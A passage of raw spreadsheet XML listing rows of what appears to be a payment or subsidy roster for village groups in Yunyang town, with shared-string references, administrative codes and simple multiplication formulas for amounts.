      <c r="J1503" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1503" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1504" ht="23" customHeight="1" spans="1:11">
      <c r="A1504" s="13" t="s">
        <v>4040</v>
      </c>
      <c r="B1504" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1504" s="14" t="s">
        <v>3807</v>
      </c>
      <c r="D1504" s="14" t="s">
        <v>4041</v>
      </c>
      <c r="E1504" s="14" t="s">
        <v>3730</v>
      </c>
      <c r="F1504" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1504" s="14">
        <v>2</v>
      </c>
      <c r="H1504" s="14">
        <v>300</v>
      </c>
      <c r="I1504" s="14">
        <f>H1504*G1504</f>
        <v>600</v>
      </c>
      <c r="J1504" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1504" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1505" ht="23" customHeight="1" spans="1:11">
      <c r="A1505" s="13" t="s">
        <v>4042</v>
      </c>
      <c r="B1505" s="14" t="str">
        <f>B1504</f>
        <v>云阳镇</v>
      </c>
      <c r="C1505" s="14" t="str">
        <f>C1504</f>
        <v>镇直（政府）</v>
      </c>
      <c r="D1505" s="13" t="s">
        <v>4043</v>
      </c>
      <c r="E1505" s="13" t="s">
        <v>4044</v>
      </c>
      <c r="F1505" s="14" t="str">
        <f>F1504</f>
        <v>4113210599</v>
      </c>
      <c r="G1505" s="14"/>
      <c r="H1505" s="14"/>
      <c r="I1505" s="14"/>
      <c r="J1505" s="14"/>
      <c r="K1505" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1506" ht="23" customHeight="1" spans="1:11">
      <c r="A1506" s="13" t="s">
        <v>4045</v>
      </c>
      <c r="B1506" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1506" s="14" t="s">
        <v>3807</v>
      </c>
      <c r="D1506" s="14" t="s">
        <v>4046</v>
      </c>
      <c r="E1506" s="14" t="s">
        <v>4047</v>
      </c>
      <c r="F1506" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1506" s="14">
        <v>1</v>
      </c>
      <c r="H1506" s="14">
        <v>340</v>
      </c>
      <c r="I1506" s="14">
        <f>H1506*G1506</f>
        <v>340</v>
      </c>
      <c r="J1506" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1506" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1507" ht="23" customHeight="1" spans="1:11">
      <c r="A1507" s="13" t="s">
        <v>4048</v>
      </c>
      <c r="B1507" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1507" s="14" t="s">
        <v>3699</v>
      </c>
      <c r="D1507" s="14" t="s">
        <v>4049</v>
      </c>
      <c r="E1507" s="14" t="s">
        <v>3769</v>
      </c>
      <c r="F1507" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1507" s="14">
        <v>1</v>
      </c>
      <c r="H1507" s="14">
        <v>340</v>
      </c>
      <c r="I1507" s="14">
        <f>H1507*G1507</f>
        <v>340</v>
      </c>
      <c r="J1507" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1507" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1508" ht="23" customHeight="1" spans="1:11">
      <c r="A1508" s="13" t="s">
        <v>4050</v>
      </c>
      <c r="B1508" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1508" s="14" t="s">
        <v>3857</v>
      </c>
      <c r="D1508" s="14" t="s">
        <v>4051</v>
      </c>
      <c r="E1508" s="14" t="s">
        <v>3975</v>
      </c>
      <c r="F1508" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1508" s="14">
        <v>2</v>
      </c>
      <c r="H1508" s="14">
        <v>300</v>
      </c>
      <c r="I1508" s="14">
        <f>H1508*G1508</f>
        <v>600</v>
      </c>
      <c r="J1508" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1508" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1509" ht="23" customHeight="1" spans="1:11">
      <c r="A1509" s="13" t="s">
        <v>4052</v>
      </c>
      <c r="B1509" s="14" t="str">
        <f>B1508</f>
        <v>云阳镇</v>
      </c>
      <c r="C1509" s="14" t="str">
        <f>C1508</f>
        <v>老城二组</v>
      </c>
      <c r="D1509" s="13" t="s">
        <v>4053</v>
      </c>
      <c r="E1509" s="13" t="s">
        <v>3794</v>
      </c>
      <c r="F1509" s="14" t="str">
        <f>F1508</f>
        <v>4113210523</v>
      </c>
      <c r="G1509" s="14"/>
      <c r="H1509" s="14"/>
      <c r="I1509" s="14"/>
      <c r="J1509" s="14"/>
      <c r="K1509" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1510" ht="23" customHeight="1" spans="1:11">
      <c r="A1510" s="13" t="s">
        <v>4054</v>
      </c>
      <c r="B1510" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1510" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1510" s="14" t="s">
        <v>4055</v>
      </c>
      <c r="E1510" s="14" t="s">
        <v>3923</v>
      </c>
      <c r="F1510" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1510" s="14">
        <v>1</v>
      </c>
      <c r="H1510" s="14">
        <v>340</v>
      </c>
      <c r="I1510" s="14">
        <f t="shared" ref="I1510:I1522" si="76">H1510*G1510</f>
        <v>340</v>
      </c>
      <c r="J1510" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1510" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1511" ht="23" customHeight="1" spans="1:11">
      <c r="A1511" s="13" t="s">
        <v>4056</v>
      </c>
      <c r="B1511" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1511" s="14" t="s">
        <v>4057</v>
      </c>
      <c r="D1511" s="14" t="s">
        <v>4058</v>
      </c>
      <c r="E1511" s="14" t="s">
        <v>3956</v>
      </c>
      <c r="F1511" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1511" s="14">
        <v>1</v>
      </c>
      <c r="H1511" s="14">
        <v>340</v>
      </c>
      <c r="I1511" s="14">
        <f t="shared" si="76"/>
        <v>340</v>
      </c>
      <c r="J1511" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1511" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1512" ht="23" customHeight="1" spans="1:11">
      <c r="A1512" s="13" t="s">
        <v>4059</v>
      </c>
      <c r="B1512" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1512" s="14" t="s">
        <v>3911</v>
      </c>
      <c r="D1512" s="14" t="s">
        <v>4060</v>
      </c>
      <c r="E1512" s="14" t="s">
        <v>2632</v>
      </c>
      <c r="F1512" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1512" s="14">
        <v>1</v>
      </c>
      <c r="H1512" s="14">
        <v>340</v>
      </c>
      <c r="I1512" s="14">
        <f t="shared" si="76"/>
        <v>340</v>
      </c>
      <c r="J1512" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1512" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1513" ht="23" customHeight="1" spans="1:11">
      <c r="A1513" s="13" t="s">
        <v>4061</v>
      </c>
      <c r="B1513" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1513" s="14" t="s">
        <v>3771</v>
      </c>
      <c r="D1513" s="14" t="s">
        <v>4062</v>
      </c>
      <c r="E1513" s="14" t="s">
        <v>3706</v>
      </c>
      <c r="F1513" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1513" s="14">
        <v>1</v>
      </c>
      <c r="H1513" s="14">
        <v>340</v>
      </c>
      <c r="I1513" s="14">
        <f t="shared" si="76"/>
        <v>340</v>
      </c>
      <c r="J1513" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1513" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1514" ht="23" customHeight="1" spans="1:11">
      <c r="A1514" s="13" t="s">
        <v>4063</v>
      </c>
      <c r="B1514" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1514" s="14" t="s">
        <v>3718</v>
      </c>
      <c r="D1514" s="14" t="s">
        <v>4064</v>
      </c>
      <c r="E1514" s="14" t="s">
        <v>3975</v>
      </c>
      <c r="F1514" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1514" s="14">
        <v>1</v>
      </c>
      <c r="H1514" s="14">
        <v>340</v>
      </c>
      <c r="I1514" s="14">
        <f t="shared" si="76"/>
        <v>340</v>
      </c>
      <c r="J1514" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1514" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1515" ht="23" customHeight="1" spans="1:11">
      <c r="A1515" s="13" t="s">
        <v>4065</v>
      </c>
      <c r="B1515" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1515" s="14" t="s">
        <v>3690</v>
      </c>
      <c r="D1515" s="14" t="s">
        <v>4066</v>
      </c>
      <c r="E1515" s="14" t="s">
        <v>4067</v>
      </c>
      <c r="F1515" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1515" s="14">
        <v>1</v>
      </c>
      <c r="H1515" s="14">
        <v>340</v>
      </c>
      <c r="I1515" s="14">
        <f t="shared" si="76"/>
        <v>340</v>
      </c>
      <c r="J1515" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1515" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1516" ht="23" customHeight="1" spans="1:11">
      <c r="A1516" s="13" t="s">
        <v>4068</v>
      </c>
      <c r="B1516" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1516" s="14" t="s">
        <v>4069</v>
      </c>
      <c r="D1516" s="14" t="s">
        <v>4070</v>
      </c>
      <c r="E1516" s="14" t="s">
        <v>2632</v>
      </c>
      <c r="F1516" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1516" s="14">
        <v>1</v>
      </c>
      <c r="H1516" s="14">
        <v>340</v>
      </c>
      <c r="I1516" s="14">
        <f t="shared" si="76"/>
        <v>340</v>
      </c>
      <c r="J1516" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1516" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1517" ht="23" customHeight="1" spans="1:11">
      <c r="A1517" s="13" t="s">
        <v>4071</v>
      </c>
      <c r="B1517" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1517" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1517" s="14" t="s">
        <v>4072</v>
      </c>
      <c r="E1517" s="14" t="s">
        <v>3093</v>
      </c>
      <c r="F1517" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1517" s="14">
        <v>1</v>
      </c>
      <c r="H1517" s="14">
        <v>340</v>
      </c>
      <c r="I1517" s="14">
        <f t="shared" si="76"/>
        <v>340</v>
      </c>
      <c r="J1517" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1517" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1518" ht="23" customHeight="1" spans="1:11">
      <c r="A1518" s="13" t="s">
        <v>4073</v>
      </c>
      <c r="B1518" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1518" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1518" s="14" t="s">
        <v>4074</v>
      </c>
      <c r="E1518" s="14" t="s">
        <v>3956</v>
      </c>
      <c r="F1518" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1518" s="14">
        <v>1</v>
      </c>
      <c r="H1518" s="14">
        <v>340</v>
      </c>
      <c r="I1518" s="14">
        <f t="shared" si="76"/>
        <v>340</v>
      </c>
      <c r="J1518" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1518" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1519" ht="23" customHeight="1" spans="1:11">
      <c r="A1519" s="13" t="s">
        <v>4075</v>
      </c>
      <c r="B1519" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1519" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1519" s="14" t="s">
        <v>4076</v>
      </c>
      <c r="E1519" s="14" t="s">
        <v>4077</v>
      </c>
      <c r="F1519" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1519" s="14">
        <v>2</v>
      </c>
      <c r="H1519" s="14">
        <v>300</v>
      </c>
      <c r="I1519" s="14">
        <f t="shared" si="76"/>
        <v>600</v>
      </c>
      <c r="J1519" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1519" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1520" ht="23" customHeight="1" spans="1:11">
      <c r="A1520" s="13" t="s">
        <v>4078</v>
      </c>
      <c r="B1520" s="14" t="str">
        <f>B1519</f>
        <v>云阳镇</v>
      </c>
      <c r="C1520" s="14" t="str">
        <f>C1519</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1520" s="13" t="s">
        <v>4079</v>
      </c>
      <c r="E1520" s="13" t="s">
        <v>3727</v>
      </c>
      <c r="F1520" s="14" t="str">
        <f>F1519</f>
        <v>4113210519</v>
      </c>
      <c r="G1520" s="14"/>
      <c r="H1520" s="14"/>
      <c r="I1520" s="14"/>
      <c r="J1520" s="14"/>
      <c r="K1520" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1521" ht="23" customHeight="1" spans="1:11">
      <c r="A1521" s="13" t="s">
        <v>4080</v>
      </c>
      <c r="B1521" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1521" s="14" t="s">
        <v>3771</v>
      </c>
      <c r="D1521" s="14" t="s">
        <v>4081</v>
      </c>
      <c r="E1521" s="14" t="s">
        <v>3723</v>
      </c>
      <c r="F1521" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1521" s="14">
        <v>1</v>
      </c>
      <c r="H1521" s="14">
        <v>340</v>
      </c>
      <c r="I1521" s="14">
        <f t="shared" ref="I1521:I1529" si="77">H1521*G1521</f>
        <v>340</v>
      </c>
      <c r="J1521" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1521" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1522" ht="23" customHeight="1" spans="1:11">
      <c r="A1522" s="13" t="s">
        <v>4082</v>
      </c>
      <c r="B1522" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1522" s="14" t="s">
        <v>3681</v>
      </c>
      <c r="D1522" s="14" t="s">
        <v>4083</v>
      </c>
      <c r="E1522" s="14" t="s">
        <v>4084</v>
      </c>
      <c r="F1522" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1522" s="14">
        <v>1</v>
      </c>
      <c r="H1522" s="14">
        <v>340</v>
      </c>
      <c r="I1522" s="14">
        <f t="shared" si="77"/>
        <v>340</v>
      </c>
      <c r="J1522" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1522" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1523" ht="23" customHeight="1" spans="1:11">
      <c r="A1523" s="13" t="s">
        <v>4085</v>
      </c>
      <c r="B1523" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1523" s="14" t="s">
        <v>3718</v>
      </c>
      <c r="D1523" s="14" t="s">
        <v>4086</v>
      </c>
      <c r="E1523" s="14" t="s">
        <v>4002</v>
      </c>
      <c r="F1523" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1523" s="14">
        <v>1</v>
      </c>
      <c r="H1523" s="14">
        <v>340</v>
      </c>
      <c r="I1523" s="14">
        <f t="shared" si="77"/>
        <v>340</v>
      </c>
      <c r="J1523" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1523" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1524" ht="23" customHeight="1" spans="1:11">
      <c r="A1524" s="13" t="s">
        <v>4087</v>
      </c>
      <c r="B1524" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1524" s="14" t="s">
        <v>3744</v>
      </c>
      <c r="D1524" s="14" t="s">
        <v>4088</v>
      </c>
      <c r="E1524" s="14" t="s">
        <v>1336</v>
      </c>
      <c r="F1524" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1524" s="14">
        <v>1</v>
      </c>
      <c r="H1524" s="14">
        <v>340</v>
      </c>
      <c r="I1524" s="14">
        <f t="shared" si="77"/>
        <v>340</v>
      </c>
      <c r="J1524" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1524" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1525" ht="23" customHeight="1" spans="1:11">
      <c r="A1525" s="13" t="s">
        <v>4089</v>
      </c>
      <c r="B1525" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1525" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1525" s="14" t="s">
        <v>4090</v>
      </c>
      <c r="E1525" s="14" t="s">
        <v>4091</v>
      </c>
      <c r="F1525" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1525" s="14">
        <v>1</v>
      </c>
      <c r="H1525" s="14">
        <v>340</v>
      </c>
      <c r="I1525" s="14">
        <f t="shared" si="77"/>
        <v>340</v>
      </c>
      <c r="J1525" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1525" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1526" ht="23" customHeight="1" spans="1:11">
      <c r="A1526" s="13" t="s">
        <v>4092</v>
      </c>
      <c r="B1526" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1526" s="14" t="s">
        <v>3771</v>
      </c>
      <c r="D1526" s="14" t="s">
        <v>4093</v>
      </c>
      <c r="E1526" s="14" t="s">
        <v>3458</v>
      </c>
      <c r="F1526" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1526" s="14">
        <v>1</v>
      </c>
      <c r="H1526" s="14">
        <v>340</v>
      </c>
      <c r="I1526" s="14">
        <f t="shared" si="77"/>
        <v>340</v>
      </c>
      <c r="J1526" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1526" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1527" ht="23" customHeight="1" spans="1:11">
      <c r="A1527" s="13" t="s">
        <v>4094</v>
      </c>
      <c r="B1527" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1527" s="14" t="s">
        <v>3938</v>
      </c>
      <c r="D1527" s="14" t="s">
        <v>4095</v>
      </c>
      <c r="E1527" s="14" t="s">
        <v>4016</v>
      </c>
      <c r="F1527" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1527" s="14">
        <v>1</v>
      </c>
      <c r="H1527" s="14">
        <v>340</v>
      </c>
      <c r="I1527" s="14">
        <f t="shared" si="77"/>
        <v>340</v>
      </c>
      <c r="J1527" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1527" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1528" ht="23" customHeight="1" spans="1:11">
      <c r="A1528" s="13" t="s">
        <v>4096</v>
      </c>
      <c r="B1528" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1528" s="14" t="s">
        <v>3681</v>
      </c>
      <c r="D1528" s="14" t="s">
        <v>4097</v>
      </c>
      <c r="E1528" s="14" t="s">
        <v>3692</v>
      </c>
      <c r="F1528" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1528" s="14">
        <v>1</v>
      </c>
      <c r="H1528" s="14">
        <v>340</v>
      </c>
      <c r="I1528" s="14">
        <f t="shared" si="77"/>
        <v>340</v>
      </c>
      <c r="J1528" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1528" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1529" ht="23" customHeight="1" spans="1:11">
      <c r="A1529" s="13" t="s">
        <v>4098</v>
      </c>
      <c r="B1529" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1529" s="14" t="s">
        <v>3725</v>
      </c>
      <c r="D1529" s="14" t="s">
        <v>4099</v>
      </c>
      <c r="E1529" s="14" t="s">
        <v>3710</v>
      </c>
      <c r="F1529" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1529" s="14">
        <v>2</v>
      </c>
      <c r="H1529" s="14">
        <v>300</v>
      </c>
      <c r="I1529" s="14">
        <f t="shared" si="77"/>
        <v>600</v>
      </c>
      <c r="J1529" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1529" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1530" ht="23" customHeight="1" spans="1:11">
      <c r="A1530" s="13" t="s">
        <v>4100</v>
      </c>
      <c r="B1530" s="14" t="str">
        <f>B1529</f>
        <v>云阳镇</v>
      </c>
      <c r="C1530" s="14" t="str">
        <f>C1529</f>
        <v>小关二组</v>
      </c>
      <c r="D1530" s="13" t="s">
        <v>4101</v>
      </c>
      <c r="E1530" s="13" t="s">
        <v>3692</v>
      </c>
      <c r="F1530" s="14" t="str">
        <f>F1529</f>
        <v>4113210521</v>
      </c>
      <c r="G1530" s="14"/>
      <c r="H1530" s="14"/>
      <c r="I1530" s="14"/>
      <c r="J1530" s="14"/>
      <c r="K1530" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1531" ht="23" customHeight="1" spans="1:11">
      <c r="A1531" s="13" t="s">
        <v>4102</v>
      </c>
      <c r="B1531" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1531" s="14" t="s">
        <v>3725</v>
      </c>
      <c r="D1531" s="14" t="s">
        <v>4103</v>
      </c>
      <c r="E1531" s="14" t="s">
        <v>3829</v>
      </c>
      <c r="F1531" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1531" s="14">
        <v>1</v>
      </c>
      <c r="H1531" s="14">
        <v>340</v>
      </c>
      <c r="I1531" s="14">
        <f t="shared" ref="I1531:I1540" si="78">H1531*G1531</f>
        <v>340</v>
      </c>
      <c r="J1531" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1531" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1532" ht="23" customHeight="1" spans="1:11">
      <c r="A1532" s="13" t="s">
        <v>4104</v>
      </c>
      <c r="B1532" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1532" s="14" t="s">
        <v>3857</v>
      </c>
      <c r="D1532" s="14" t="s">
        <v>4105</v>
      </c>
      <c r="E1532" s="14" t="s">
        <v>4106</v>
      </c>
      <c r="F1532" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1532" s="14">
        <v>1</v>
      </c>
      <c r="H1532" s="14">
        <v>340</v>
      </c>
      <c r="I1532" s="14">
        <f t="shared" si="78"/>
        <v>340</v>
      </c>
      <c r="J1532" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1532" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1533" ht="23" customHeight="1" spans="1:11">
      <c r="A1533" s="13" t="s">
        <v>4107</v>
      </c>
      <c r="B1533" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1533" s="14" t="s">
        <v>3938</v>
      </c>
      <c r="D1533" s="14" t="s">
        <v>4108</v>
      </c>
      <c r="E1533" s="14" t="s">
        <v>3787</v>
      </c>
      <c r="F1533" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1533" s="14">
        <v>1</v>
      </c>
      <c r="H1533" s="14">
        <v>340</v>
      </c>
      <c r="I1533" s="14">
        <f t="shared" si="78"/>
        <v>340</v>
      </c>
      <c r="J1533" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1533" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1534" ht="23" customHeight="1" spans="1:11">
      <c r="A1534" s="13" t="s">
        <v>4109</v>
      </c>
      <c r="B1534" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1534" s="14" t="s">
        <v>3725</v>
      </c>
      <c r="D1534" s="14" t="s">
        <v>4110</v>
      </c>
      <c r="E1534" s="14" t="s">
        <v>4111</v>
      </c>
      <c r="F1534" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1534" s="14">
        <v>1</v>
      </c>
      <c r="H1534" s="14">
        <v>340</v>
      </c>
      <c r="I1534" s="14">
        <f t="shared" si="78"/>
        <v>340</v>
      </c>
      <c r="J1534" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1534" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1535" ht="23" customHeight="1" spans="1:11">
      <c r="A1535" s="13" t="s">
        <v>4112</v>
      </c>
      <c r="B1535" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1535" s="14" t="s">
        <v>3938</v>
      </c>
      <c r="D1535" s="14" t="s">
        <v>1635</v>
      </c>
      <c r="E1535" s="14" t="s">
        <v>3869</v>
      </c>
      <c r="F1535" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1535" s="14">
        <v>1</v>
      </c>
      <c r="H1535" s="14">
        <v>340</v>
      </c>
      <c r="I1535" s="14">
        <f t="shared" si="78"/>
        <v>340</v>
      </c>
      <c r="J1535" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1535" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1536" ht="23" customHeight="1" spans="1:11">
      <c r="A1536" s="13" t="s">
        <v>4113</v>
      </c>
      <c r="B1536" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1536" s="14" t="s">
        <v>3725</v>
      </c>
      <c r="D1536" s="14" t="s">
        <v>4114</v>
      </c>
      <c r="E1536" s="14" t="s">
        <v>4115</v>
      </c>
      <c r="F1536" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1536" s="14">
        <v>1</v>
      </c>
      <c r="H1536" s="14">
        <v>340</v>
      </c>
      <c r="I1536" s="14">
        <f t="shared" si="78"/>
        <v>340</v>
      </c>
      <c r="J1536" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1536" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1537" ht="23" customHeight="1" spans="1:11">
      <c r="A1537" s="13" t="s">
        <v>4116</v>
      </c>
      <c r="B1537" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1537" s="14" t="s">
        <v>3718</v>
      </c>
      <c r="D1537" s="14" t="s">
        <v>4117</v>
      </c>
      <c r="E1537" s="14" t="s">
        <v>4118</v>
      </c>
      <c r="F1537" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1537" s="14">
        <v>1</v>
      </c>
      <c r="H1537" s="14">
        <v>340</v>
      </c>
      <c r="I1537" s="14">
        <f t="shared" si="78"/>
        <v>340</v>
      </c>
      <c r="J1537" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1537" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1538" ht="23" customHeight="1" spans="1:11">
      <c r="A1538" s="13" t="s">
        <v>4119</v>
      </c>
      <c r="B1538" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1538" s="14" t="s">
        <v>4120</v>
      </c>
      <c r="D1538" s="14" t="s">
        <v>4121</v>
      </c>
      <c r="E1538" s="14" t="s">
        <v>3769</v>
      </c>
      <c r="F1538" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1538" s="14">
        <v>1</v>
      </c>
      <c r="H1538" s="14">
        <v>340</v>
      </c>
      <c r="I1538" s="14">
        <f t="shared" si="78"/>
        <v>340</v>
      </c>
      <c r="J1538" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1538" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1539" ht="23" customHeight="1" spans="1:11">
      <c r="A1539" s="13" t="s">
        <v>4122</v>
      </c>
      <c r="B1539" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1539" s="14" t="s">
        <v>3721</v>
      </c>
      <c r="D1539" s="14" t="s">
        <v>4123</v>
      </c>
      <c r="E1539" s="14" t="s">
        <v>3916</v>
      </c>
      <c r="F1539" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1539" s="14">
        <v>1</v>
      </c>
      <c r="H1539" s="14">
        <v>340</v>
      </c>
      <c r="I1539" s="14">
        <f t="shared" si="78"/>
        <v>340</v>
      </c>
      <c r="J1539" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1539" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1540" ht="23" customHeight="1" spans="1:11">
      <c r="A1540" s="13" t="s">
        <v>4124</v>
      </c>
      <c r="B1540" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1540" s="14" t="s">
        <v>3681</v>
      </c>
      <c r="D1540" s="14" t="s">
        <v>4125</v>
      </c>
      <c r="E1540" s="14" t="s">
        <v>4126</v>
      </c>
      <c r="F1540" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1540" s="14">
        <v>2</v>
      </c>
      <c r="H1540" s="14">
        <v>300</v>
      </c>
      <c r="I1540" s="14">
        <f t="shared" si="78"/>
        <v>600</v>
      </c>
      <c r="J1540" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1540" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1541" ht="23" customHeight="1" spans="1:11">
      <c r="A1541" s="13" t="s">
        <v>4127</v>
      </c>
      <c r="B1541" s="14" t="str">
        <f>B1540</f>
        <v>云阳镇</v>
      </c>
      <c r="C1541" s="14" t="str">
        <f>C1540</f>
        <v>小关四组</v>
      </c>
      <c r="D1541" s="18" t="s">
        <v>4128</v>
      </c>
      <c r="E1541" s="22" t="s">
        <v>4129</v>
      </c>
      <c r="F1541" s="14" t="str">
        <f>F1540</f>
        <v>4113210521</v>
      </c>
      <c r="G1541" s="14"/>
      <c r="H1541" s="14"/>
      <c r="I1541" s="14"/>
      <c r="J1541" s="14"/>
      <c r="K1541" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1542" ht="23" customHeight="1" spans="1:11">
